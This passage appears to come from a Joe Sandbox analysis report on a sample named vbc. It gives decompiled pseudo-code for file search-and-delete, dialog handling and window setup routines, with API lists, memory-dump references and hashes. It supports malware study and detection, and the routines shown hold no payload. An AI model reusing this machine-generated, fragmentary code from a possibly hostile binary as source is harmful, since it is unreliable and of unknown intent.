          					__eflags =  *0x7a3f90 - 0x5c;
          					if( *0x7a3f90 != 0x5c) {
          						goto L11;
          					}
          					goto L10;
          				} else {
          					__eflags = _t38;
          					if(_t38 == 0) {
          						L28:
          						__eflags = _a4;
          						if(_a4 == 0) {
          							L36:
          							return _t38;
          						}
          						__eflags = _v12;
          						if(_v12 != 0) {
          							_t38 = E004069A4(_t68);
          							__eflags = _t38;
          							if(_t38 == 0) {
          								goto L36;
          							}
          							E00405F3D(_t68);
          							_t38 = E00405D32(__eflags, _t68, _v8 | 0x00000001);
          							__eflags = _t38;
          							if(_t38 != 0) {
          								return E004056D0(0xffffffe5, _t68);
          							}
          							__eflags = _v8;
          							if(_v8 == 0) {
          								goto L30;
          							}
          							E004056D0(0xfffffff1, _t68);
          							return E0040642E(_t67, _t68, 0);
          						}
          						L30:
          						 *0x7a8b28 =  *0x7a8b28 + 1;
          						return _t38;
          					}
          					__eflags = _t65 & 0x00000002;
          					if((_t65 & 0x00000002) == 0) {
          						goto L28;
          					}
          					goto L5;
          				}
          			}


















          0x00405d84
          0x00405d89
          0x00405d92
          0x00405d95
          0x00405d9d
          0x00405da0
          0x00405da3
          0x00405dab
          0x00405dad
          0x00405dae
          0x00000000
          0x00405dae
          0x00405db9
          0x00405dbc
          0x00405dbc
          0x00405dbc
          0x00405dc0
          0x00405dd3
          0x00405dda
          0x00405ddf
          0x00405de3
          0x00405df3
          0x00405de5
          0x00405deb
          0x00405deb
          0x00405df8
          0x00405dfc
          0x00405e08
          0x00405e0e
          0x00405e13
          0x00405e19
          0x00405e24
          0x00405e2a
          0x00405e2c
          0x00405e2f
          0x00405ed9
          0x00405ed9
          0x00405edd
          0x00405edf
          0x00405edf
          0x00405edf
          0x00405edf
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00405e35
          0x00405e35
          0x00405e35
          0x00405e3d
          0x00405e5d
          0x00405e65
          0x00405e6a
          0x00405e71
          0x00405e8c
          0x00405e91
          0x00405e93
          0x00405eb7
          0x00405e95
          0x00405e95
          0x00405e98
          0x00405eac
          0x00405e9a
          0x00405e9d
          0x00405ea5
          0x00405ea5
          0x00405e98
          0x00405e73
          0x00405e79
          0x00405e7b
          0x00405e81
          0x00405e81
          0x00405e7b
          0x00000000
          0x00405e71
          0x00405e3f
          0x00405e47
          0x00000000
          0x00000000
          0x00405e49
          0x00405e51
          0x00000000
          0x00000000
          0x00405e53
          0x00405e5b
          0x00000000
          0x00000000
          0x00000000
          0x00405ebc
          0x00405ec4
          0x00405eca
          0x00405eca
          0x00405ed3
          0x00000000
          0x00405ed3
          0x00405dfe
          0x00405e06
          0x00000000
          0x00000000
          0x00000000
          0x00405dc2
          0x00405dc2
          0x00405dc4
          0x00405ee4
          0x00405ee6
          0x00405ee9
          0x00405f3a
          0x00405f3a
          0x00405f3a
          0x00405eeb
          0x00405eee
          0x00405ef9
          0x00405efe
          0x00405f00
          0x00000000
          0x00000000
          0x00405f03
          0x00405f0f
          0x00405f14
          0x00405f16
          0x00000000
          0x00405f31
          0x00405f18
          0x00405f1b
          0x00000000
          0x00000000
          0x00405f20
          0x00000000
          0x00405f27
          0x00405ef0
          0x00405ef0
          0x00000000
          0x00405ef0
          0x00405dca
          0x00405dcd
          0x00000000
          0x00000000
          0x00000000
          0x00405dcd

          APIs
          • DeleteFileW.KERNELBASE(?,?,7556D4C4,755513E0,00000000), ref: 00405DA3
          • lstrcatW.KERNEL32 ref: 00405DEB
          • lstrcatW.KERNEL32 ref: 00405E0E
          • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F90,?,?,7556D4C4,755513E0,00000000), ref: 00405E14
          • FindFirstFileW.KERNELBASE(007A3F90,?,?,?,0040A014,?,007A3F90,?,?,7556D4C4,755513E0,00000000), ref: 00405E24
          • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EC4
          • FindClose.KERNELBASE(00000000), ref: 00405ED3
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
          • String ID: .$.$\*.*
          • API String ID: 2035342205-3749113046
          • Opcode ID: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
          • Instruction ID: b1f38bcf7b39c15e0faf9db06640fc0f7a2e3671fe4bba31c24ee78ec55d2bca
          • Opcode Fuzzy Hash: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
          • Instruction Fuzzy Hash: 5541E230800A15AADB21AB61CC49ABF7678DF42714F20813FF845B11D1EB7C4E91DEAE
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E004069A4(WCHAR* _a4) {
          				void* _t2;
          
          				_t2 = FindFirstFileW(_a4, 0x7a4fd8); // executed
          				if(_t2 == 0xffffffff) {
          					return 0;
          				}
          				FindClose(_t2);
          				return 0x7a4fd8;
          			}




          0x004069af
          0x004069b8
          0x00000000
          0x004069c5
          0x004069bb
          0x00000000

          APIs
          • FindFirstFileW.KERNELBASE(7556D4C4,007A4FD8,007A4790,0040608E,007A4790,007A4790,00000000,007A4790,007A4790,7556D4C4,?,755513E0,00405D9A,?,7556D4C4,755513E0), ref: 004069AF
          • FindClose.KERNEL32(00000000), ref: 004069BB
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: Find$CloseFileFirst
          • String ID:
          • API String ID: 2295610775-0
          • Opcode ID: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
          • Instruction ID: 60c22f5c8fe31c667ed350a31965a044de81702d272a45ebe5fc25ec47674b4c
          • Opcode Fuzzy Hash: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
          • Instruction Fuzzy Hash: 47D012F15191205FCB4017786E0C84B7A589F573313264B36B0A6F55E0D6748C3787AC
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 141 4040cb-4040dd 142 4040e3-4040e9 141->142 143 404244-404253 141->143 142->143 146 4040ef-4040f8 142->146 144 4042a2-4042b7 143->144 145 404255-40429d GetDlgItem * 2 call 4045ca SetClassLongW call 40140b 143->145 148 4042f7-4042fc call 404616 144->148 149 4042b9-4042bc 144->149 145->144 150 4040fa-404107 SetWindowPos 146->150 151 40410d-404114 146->151 165 404301-40431c 148->165 155 4042be-4042c9 call 401389 149->155 156 4042ef-4042f1 149->156 150->151 152 404116-404130 ShowWindow 151->152 153 404158-40415e 151->153 158 404231-40423f call 404631 152->158 159 404136-404149 GetWindowLongW 152->159 160 404160-404172 DestroyWindow 153->160 161 404177-40417a 153->161 155->156 181 4042cb-4042ea SendMessageW 155->181 156->148 164 404597 156->164 171 404599-4045a0 158->171 159->158 168 40414f-404152 ShowWindow 159->168 169 404574-40457a 160->169 172 40417c-404188 SetWindowLongW 161->172 173 40418d-404193 161->173 164->171 166 404325-40432b 165->166 167 40431e-404320 call 40140b 165->167 178 404331-40433c 166->178 179 404555-40456e DestroyWindow EndDialog 166->179 167->166 168->153 169->164 177 40457c-404582 169->177 172->171 173->158 180 404199-4041a8 GetDlgItem 173->180 177->164 183 404584-40458d ShowWindow 177->183 178->179 184 404342-40438f call 4066ab call 4045ca * 3 GetDlgItem 178->184 179->169 185 4041c7-4041ca 180->185 186 4041aa-4041c1 SendMessageW IsWindowEnabled 180->186 181->171 183->164 213 404391-404396 184->213 214 404399-4043d5 ShowWindow EnableWindow call 4045ec EnableWindow 184->214 188 4041cc-4041cd 185->188 189 4041cf-4041d2 185->189 186->164 186->185 191 4041fd-404202 call 4045a3 188->191 192 4041e0-4041e5 189->192 193 4041d4-4041da 189->193 191->158 194 4041e7-4041ed 192->194 195 40421b-40422b SendMessageW 192->195 193->195 198 4041dc-4041de 193->198 199 404204-40420d call 40140b 194->199 200 4041ef-4041f5 call 40140b 194->200 195->158 198->191 199->158 210 40420f-404219 199->210 209 4041fb 200->209 209->191 210->209 213->214 217 4043d7-4043d8 214->217 218 4043da 214->218 219 4043dc-40440a GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 40440c-40441d SendMessageW 219->220 221 40441f 219->221 222 404425-404464 call 4045ff call 4040ac call 40666e lstrlenW call 4066ab SetWindowTextW call 401389 220->222 221->222 222->165 233 40446a-40446c 222->233 233->165 234 404472-404476 233->234 235 404495-4044a9 DestroyWindow 234->235 236 404478-40447e 234->236 235->169 238 4044af-4044dc CreateDialogParamW 235->238 236->164 237 404484-40448a 236->237 237->165 239 404490 237->239 238->169 240 4044e2-404539 call 4045ca GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->164 240->164 245 40453b-404553 ShowWindow call 404616 240->245 245->169
          C-Code - Quality: 84%
          			E004040CB(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
          				struct HWND__* _v28;
          				void* _v84;
          				void* _v88;
          				void* __ebx;
          				void* __edi;
          				void* __esi;
          				signed int _t34;
          				signed int _t36;
          				signed int _t38;
          				struct HWND__* _t48;
          				signed int _t67;
          				struct HWND__* _t73;
          				signed int _t86;
          				struct HWND__* _t91;
          				signed int _t99;
          				int _t103;
          				signed int _t117;
          				int _t118;
          				int _t122;
          				signed int _t124;
          				struct HWND__* _t127;
          				struct HWND__* _t128;
          				int _t129;
          				intOrPtr _t130;
          				long _t133;
          				int _t135;
          				int _t136;
          				void* _t137;
          
          				_t130 = _a8;
          				if(_t130 == 0x110 || _t130 == 0x408) {
          					_t34 = _a12;
          					_t127 = _a4;
          					__eflags = _t130 - 0x110;
          					 *0x7a1f70 = _t34;
          					if(_t130 == 0x110) {
          						 *0x7a8aa8 = _t127;
          						 *0x7a1f84 = GetDlgItem(_t127, 1);
          						_t91 = GetDlgItem(_t127, 2);
          						_push(0xffffffff);
          						_push(0x1c);
          						 *0x79ff50 = _t91;
          						E004045CA(_t127);
          						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a88);
          						 *0x7a7a6c = E0040140B(4);
          						_t34 = 1;
          						__eflags = 1;
          						 *0x7a1f70 = 1;
          					}
          					_t124 =  *0x40a39c; // 0x0
          					_t136 = 0;
          					_t133 = (_t124 << 6) +  *0x7a8ac0;
          					__eflags = _t124;
          					if(_t124 < 0) {
          						L36:
          						E00404616(0x40b);
          						while(1) {
          							_t36 =  *0x7a1f70;
          							 *0x40a39c =  *0x40a39c + _t36;
          							_t133 = _t133 + (_t36 << 6);
          							_t38 =  *0x40a39c; // 0x0
          							__eflags = _t38 -  *0x7a8ac4;
          							if(_t38 ==  *0x7a8ac4) {
          								E0040140B(1);
          							}
          							__eflags =  *0x7a7a6c - _t136;
          							if( *0x7a7a6c != _t136) {
          								break;
          							}
          							__eflags =  *0x40a39c -  *0x7a8ac4; // 0x0
          							if(__eflags >= 0) {
          								break;
          							}
          							_t117 =  *(_t133 + 0x14);
          							E004066AB(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
          							_push( *((intOrPtr*)(_t133 + 0x20)));
          							_push(0xfffffc19);
          							E004045CA(_t127);
          							_push( *((intOrPtr*)(_t133 + 0x1c)));
          							_push(0xfffffc1b);
          							E004045CA(_t127);
          							_push( *((intOrPtr*)(_t133 + 0x28)));
          							_push(0xfffffc1a);
          							E004045CA(_t127);
          							_t48 = GetDlgItem(_t127, 3);
          							__eflags =  *0x7a8b2c - _t136;
          							_v28 = _t48;
          							if( *0x7a8b2c != _t136) {
          								_t117 = _t117 & 0x0000fefd | 0x00000004;
          								__eflags = _t117;
          							}
          							ShowWindow(_t48, _t117 & 0x00000008);
          							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
          							E004045EC(_t117 & 0x00000002);
          							_t118 = _t117 & 0x00000004;
          							EnableWindow( *0x79ff50, _t118);
          							__eflags = _t118 - _t136;
          							if(_t118 == _t136) {
          								_push(1);
          							} else {
          								_push(_t136);
          							}
          							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
          							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
          							__eflags =  *0x7a8b2c - _t136;
          							if( *0x7a8b2c == _t136) {
          								_push( *0x7a1f84);
          							} else {
          								SendMessageW(_t127, 0x401, 2, _t136);
          								_push( *0x79ff50);
          							}
          							E004045FF();
          							E0040666E(0x7a1f88, E004040AC());
          							E004066AB(0x7a1f88, _t127, _t133,  &(0x7a1f88[lstrlenW(0x7a1f88)]),  *((intOrPtr*)(_t133 + 0x18)));
          							SetWindowTextW(_t127, 0x7a1f88);
          							_push(_t136);
          							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
          							__eflags = _t67;
          							if(_t67 != 0) {
          								continue;
          							} else {
          								__eflags =  *_t133 - _t136;
          								if( *_t133 == _t136) {
          									continue;
          								}
          								__eflags =  *(_t133 + 4) - 5;
          								if( *(_t133 + 4) != 5) {
          									DestroyWindow( *0x7a7a78);
          									 *0x7a0f60 = _t133;
          									__eflags =  *_t133 - _t136;
          									if( *_t133 <= _t136) {
          										goto L60;
          									}
          									_t73 = CreateDialogParamW( *0x7a8aa0,  *_t133 +  *0x7a7a80 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
          									__eflags = _t73 - _t136;
          									 *0x7a7a78 = _t73;
          									if(_t73 == _t136) {
          										goto L60;
          									}
          									_push( *((intOrPtr*)(_t133 + 0x2c)));
          									_push(6);
          									E004045CA(_t73);
          									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
          									ScreenToClient(_t127, _t137 + 0x10);
          									SetWindowPos( *0x7a7a78, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
          									_push(_t136);
          									E00401389( *((intOrPtr*)(_t133 + 0xc)));
          									__eflags =  *0x7a7a6c - _t136;
          									if( *0x7a7a6c != _t136) {
          										goto L63;
          									}
          									ShowWindow( *0x7a7a78, 8);
          									E00404616(0x405);
          									goto L60;
          								}
          								__eflags =  *0x7a8b2c - _t136;
          								if( *0x7a8b2c != _t136) {
          									goto L63;
          								}
          								__eflags =  *0x7a8b20 - _t136;
          								if( *0x7a8b20 != _t136) {
          									continue;
          								}
          								goto L63;
          							}
          						}
          						DestroyWindow( *0x7a7a78); // executed
          						 *0x7a8aa8 = _t136;
          						EndDialog(_t127,  *0x7a0758); // executed
          						goto L60;
          					} else {
          						__eflags = _t34 - 1;
          						if(_t34 != 1) {
          							L35:
          							__eflags =  *_t133 - _t136;
          							if( *_t133 == _t136) {
          								goto L63;
          							}
          							goto L36;
          						}
          						_push(0);
          						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
          						__eflags = _t86;
          						if(_t86 == 0) {
          							goto L35;
          						}
          						SendMessageW( *0x7a7a78, 0x40f, 0, 1);
          						__eflags =  *0x7a7a6c;
          						return 0 |  *0x7a7a6c == 0x00000000;
          					}
          				} else {
          					_t127 = _a4;
          					_t136 = 0;
          					if(_t130 == 0x47) {
          						SetWindowPos( *0x7a1f68, _t127, 0, 0, 0, 0, 0x13);
          					}
          					_t122 = _a12;
          					if(_t130 != 5) {
          						L8:
          						if(_t130 != 0x40d) {
          							__eflags = _t130 - 0x11;
          							if(_t130 != 0x11) {
          								__eflags = _t130 - 0x111;
          								if(_t130 != 0x111) {
          									goto L28;
          								}
          								_t135 = _t122 & 0x0000ffff;
          								_t128 = GetDlgItem(_t127, _t135);
          								__eflags = _t128 - _t136;
          								if(_t128 == _t136) {
          									L15:
          									__eflags = _t135 - 1;
          									if(_t135 != 1) {
          										__eflags = _t135 - 3;
          										if(_t135 != 3) {
          											_t129 = 2;
          											__eflags = _t135 - _t129;
          											if(_t135 != _t129) {
          												L27:
          												SendMessageW( *0x7a7a78, 0x111, _t122, _a16);
          												goto L28;
          											}
          											__eflags =  *0x7a8b2c - _t136;
          											if( *0x7a8b2c == _t136) {
          												_t99 = E0040140B(3);
          												__eflags = _t99;
          												if(_t99 != 0) {
          													goto L28;
          												}
          												 *0x7a0758 = 1;
          												L23:
          												_push(0x78);
          												L24:
          												E004045A3();
          												goto L28;
          											}
          											E0040140B(_t129);
          											 *0x7a0758 = _t129;
          											goto L23;
          										}
          										__eflags =  *0x40a39c - _t136; // 0x0
          										if(__eflags <= 0) {
          											goto L27;
          										}
          										_push(0xffffffff);
          										goto L24;
          									}
          									_push(_t135);
          									goto L24;
          								}
          								SendMessageW(_t128, 0xf3, _t136, _t136);
          								_t103 = IsWindowEnabled(_t128);
          								__eflags = _t103;
          								if(_t103 == 0) {
          									L63:
          									return 0;
          								}
          								goto L15;
          							}
          							SetWindowLongW(_t127, _t136, _t136);
          							return 1;
          						}
          						DestroyWindow( *0x7a7a78);
          						 *0x7a7a78 = _t122;
          						L60:
          						if( *0x7a3f88 == _t136 &&  *0x7a7a78 != _t136) {
          							ShowWindow(_t127, 0xa);
          							 *0x7a3f88 = 1;
          						}
          						goto L63;
          					} else {
          						asm("sbb eax, eax");
          						ShowWindow( *0x7a1f68,  ~(_t122 - 1) & 0x00000005);
          						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
          							L28:
          							return E00404631(_a8, _t122, _a16);
          						} else {
          							ShowWindow(_t127, 4);
          							goto L8;
          						}
          					}
          				}
          			}































          0x004040d6
          0x004040dd
          0x00404244
          0x00404248
          0x0040424c
          0x0040424e
          0x00404253
          0x0040425e
          0x00404269
          0x0040426e
          0x00404270
          0x00404272
          0x00404275
          0x0040427a
          0x00404288
          0x00404295
          0x0040429c
          0x0040429c
          0x0040429d
          0x0040429d
          0x004042a2
          0x004042a8
          0x004042af
          0x004042b5
          0x004042b7
          0x004042f7
          0x004042fc
          0x00404301
          0x00404301
          0x00404306
          0x0040430f
          0x00404311
          0x00404316
          0x0040431c
          0x00404320
          0x00404320
          0x00404325
          0x0040432b
          0x00000000
          0x00000000
          0x00404336
          0x0040433c
          0x00000000
          0x00000000
          0x00404345
          0x0040434d
          0x00404352
          0x00404355
          0x0040435b
          0x00404360
          0x00404363
          0x00404369
          0x0040436e
          0x00404371
          0x00404377
          0x0040437f
          0x00404385
          0x0040438b
          0x0040438f
          0x00404396
          0x00404396
          0x00404396
          0x004043a0
          0x004043b2
          0x004043be
          0x004043c3
          0x004043cd
          0x004043d3
          0x004043d5
          0x004043da
          0x004043d7
          0x004043d7
          0x004043d7
          0x004043ea
          0x00404402
          0x00404404
          0x0040440a
          0x0040441f
          0x0040440c
          0x00404415
          0x00404417
          0x00404417
          0x00404425
          0x00404436
          0x0040444c
          0x00404453
          0x00404459
          0x0040445d
          0x00404462
          0x00404464
          0x00000000
          0x0040446a
          0x0040446a
          0x0040446c
          0x00000000
          0x00000000
          0x00404472
          0x00404476
          0x0040449b
          0x004044a1
          0x004044a7
          0x004044a9
          0x00000000
          0x00000000
          0x004044cf
          0x004044d5
          0x004044d7
          0x004044dc
          0x00000000
          0x00000000
          0x004044e2
          0x004044e5
          0x004044e8
          0x004044ff
          0x0040450b
          0x00404524
          0x0040452a
          0x0040452e
          0x00404533
          0x00404539
          0x00000000
          0x00000000
          0x00404543
          0x0040454e
          0x00000000
          0x0040454e
          0x00404478
          0x0040447e
          0x00000000
          0x00000000
          0x00404484
          0x0040448a
          0x00000000
          0x00000000
          0x00000000
          0x00404490
          0x00404464
          0x0040455b
          0x00404567
          0x0040456e
          0x00000000
          0x004042b9
          0x004042b9
          0x004042bc
          0x004042ef
          0x004042ef
          0x004042f1
          0x00000000
          0x00000000
          0x00000000
          0x004042f1
          0x004042be
          0x004042c2
          0x004042c7
          0x004042c9
          0x00000000
          0x00000000
          0x004042d9
          0x004042e1
          0x00000000
          0x004042e7
          0x004040ef
          0x004040ef
          0x004040f3
          0x004040f8
          0x00404107
          0x00404107
          0x0040410d
          0x00404114
          0x00404158
          0x0040415e
          0x00404177
          0x0040417a
          0x0040418d
          0x00404193
          0x00000000
          0x00000000
          0x00404199
          0x004041a4
          0x004041a6
          0x004041a8
          0x004041c7
          0x004041c7
          0x004041ca
          0x004041cf
          0x004041d2
          0x004041e2
          0x004041e3
          0x004041e5
          0x0040421b
          0x0040422b
          0x00000000
          0x0040422b
          0x004041e7
          0x004041ed
          0x00404206
          0x0040420b
          0x0040420d
          0x00000000
          0x00000000
          0x0040420f
          0x004041fb
          0x004041fb
          0x004041fd
          0x004041fd
          0x00000000
          0x004041fd
          0x004041f0
          0x004041f5
          0x00000000
          0x004041f5
          0x004041d4
          0x004041da
          0x00000000
          0x00000000
          0x004041dc
          0x00000000
          0x004041dc
          0x004041cc
          0x00000000
          0x004041cc
          0x004041b2
          0x004041b9
          0x004041bf
          0x004041c1
          0x00404597
          0x00000000
          0x00404597
          0x00000000
          0x004041c1
          0x0040417f
          0x00000000
          0x00404187
          0x00404166
          0x0040416c
          0x00404574
          0x0040457a
          0x00404587
          0x0040458d
          0x0040458d
          0x00000000
          0x00404116
          0x0040411b
          0x00404127
          0x00404130
          0x00404231
          0x00000000
          0x0040414f
          0x00404152
          0x00000000
          0x00404152
          0x00404130
          0x00404114

          APIs
          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404107
          • ShowWindow.USER32(?), ref: 00404127
          • GetWindowLongW.USER32(?,000000F0), ref: 00404139
          • ShowWindow.USER32(?,00000004), ref: 00404152
          • DestroyWindow.USER32 ref: 00404166
          • SetWindowLongW.USER32 ref: 0040417F
          • GetDlgItem.USER32(?,?), ref: 0040419E
          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041B2
          • IsWindowEnabled.USER32(00000000), ref: 004041B9
          • GetDlgItem.USER32(?,00000001), ref: 00404264
          • GetDlgItem.USER32(?,00000002), ref: 0040426E
          • SetClassLongW.USER32(?,000000F2,?), ref: 00404288
          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D9
          • GetDlgItem.USER32(?,00000003), ref: 0040437F
          • ShowWindow.USER32(00000000,?), ref: 004043A0
          • EnableWindow.USER32(?,?), ref: 004043B2
          • EnableWindow.USER32(?,?), ref: 004043CD
          • GetSystemMenu.USER32 ref: 004043E3
          • EnableMenuItem.USER32 ref: 004043EA
          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404402
          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404415
          • lstrlenW.KERNEL32(007A1F88,?,007A1F88,00000000), ref: 0040443F
          • SetWindowTextW.USER32 ref: 00404453
          • ShowWindow.USER32(?,0000000A), ref: 00404587
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
          • String ID:
          • API String ID: 1860320154-0
          • Opcode ID: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
          • Instruction ID: f65a6081c11fa3fb00f54a078e57315272211b1d7c342d1bec1514082707246b
          • Opcode Fuzzy Hash: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
          • Instruction Fuzzy Hash: 63C1ADB1500204BFDB216F65EE49E2A3AA8EBC6745F00853EF741B55E0CB3D5851DB2E
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 248 403d1d-403d35 call 406a3b 251 403d37-403d47 call 4065b5 248->251 252 403d49-403d80 call 40653c 248->252 261 403da3-403dcc call 403ff3 call 406045 251->261 257 403d82-403d93 call 40653c 252->257 258 403d98-403d9e lstrcatW 252->258 257->258 258->261 266 403dd2-403dd7 261->266 267 403e5e-403e66 call 406045 261->267 266->267 268 403ddd-403e05 call 40653c 266->268 273 403e74-403e99 LoadImageW 267->273 274 403e68-403e6f call 4066ab 267->274 268->267 275 403e07-403e0b 268->275 277 403f1a-403f22 call 40140b 273->277 278 403e9b-403ecb RegisterClassW 273->278 274->273 279 403e1d-403e29 lstrlenW 275->279 280 403e0d-403e1a call 405f6a 275->280 292 403f24-403f27 277->292 293 403f2c-403f37 call 403ff3 277->293 281 403ed1-403f15 SystemParametersInfoW CreateWindowExW 278->281 282 403fe9 278->282 286 403e51-403e59 call 405f3d call 40666e 279->286 287 403e2b-403e39 lstrcmpiW 279->287 280->279 281->277 285 403feb-403ff2 282->285 286->267 287->286 291 403e3b-403e45 GetFileAttributesW 287->291 296 403e47-403e49 291->296 297 403e4b-403e4c call 405f89 291->297 292->285 301 403fc0-403fc8 call 4057a3 293->301 302 403f3d-403f57 ShowWindow call 4069cb 293->302 296->286 296->297 297->286 307 403fe2-403fe4 call 40140b 301->307 308 403fca-403fd0 301->308 309 403f63-403f75 GetClassInfoW 302->309 310 403f59-403f5e call 4069cb 302->310 307->282 308->292 311 403fd6-403fdd call 40140b 308->311 314 403f77-403f87 GetClassInfoW RegisterClassW 309->314 315 403f8d-403fb0 DialogBoxParamW call 40140b 309->315 310->309 311->292 314->315 319 403fb5-403fbe call 403c6d 315->319 319->285
          C-Code - Quality: 96%
          			E00403D1D(void* __eflags) {
          				intOrPtr _v4;
          				intOrPtr _v8;
          				int _v12;
          				void _v16;
          				void* __ebx;
          				void* __edi;
          				void* __esi;
          				intOrPtr* _t22;
          				void* _t30;
          				void* _t32;
          				int _t33;
          				void* _t36;
          				int _t39;
          				int _t40;
          				int _t44;
          				short _t63;
          				WCHAR* _t65;
          				signed char _t69;
          				WCHAR* _t76;
          				intOrPtr _t82;
          				WCHAR* _t87;
          
          				_t82 =  *0x7a8ab0;
          				_t22 = E00406A3B(2);
          				_t90 = _t22;
          				if(_t22 == 0) {
          					_t76 = 0x7a1f88;
          					L"1033" = 0x30;
          					 *0x7b5002 = 0x78;
          					 *0x7b5004 = 0;
